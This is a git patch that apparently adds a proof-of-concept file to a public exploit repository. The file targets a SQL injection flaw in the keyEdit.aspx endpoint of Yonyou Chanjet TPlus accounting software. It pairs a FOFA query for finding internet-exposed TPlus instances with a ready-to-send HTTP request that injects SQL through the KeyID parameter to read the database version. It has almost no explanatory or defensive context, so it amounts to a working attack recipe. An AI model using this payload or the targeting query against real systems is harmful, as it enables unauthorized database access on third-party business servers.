From e2415599a47f79d5038aa20cd5c3b1068096ae7a Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 8 May 2024 19:39:42 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8B=E7=95=85=E6=8D=B7?= =?UTF-8?q?=E9=80=9ATPlus-keyEdit.aspx=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8?= =?UTF-8?q?SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md diff --git a/用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md b/用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md new file mode 100644 index 0000000..6a03398 --- /dev/null +++ b/用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +## 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞 + +## fofa +``` +app="畅捷通-TPlus" +``` + + +## poc +``` +GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: xx.xxx.xxx.xxx +Accept-Charset: utf-8 +``` + +![2099c8aae5cff9620805364eacbd9ea8](https://github.com/wy876/POC/assets/139549762/b1cb6ae4-3588-4de9-a97d-e57bc6607f7c)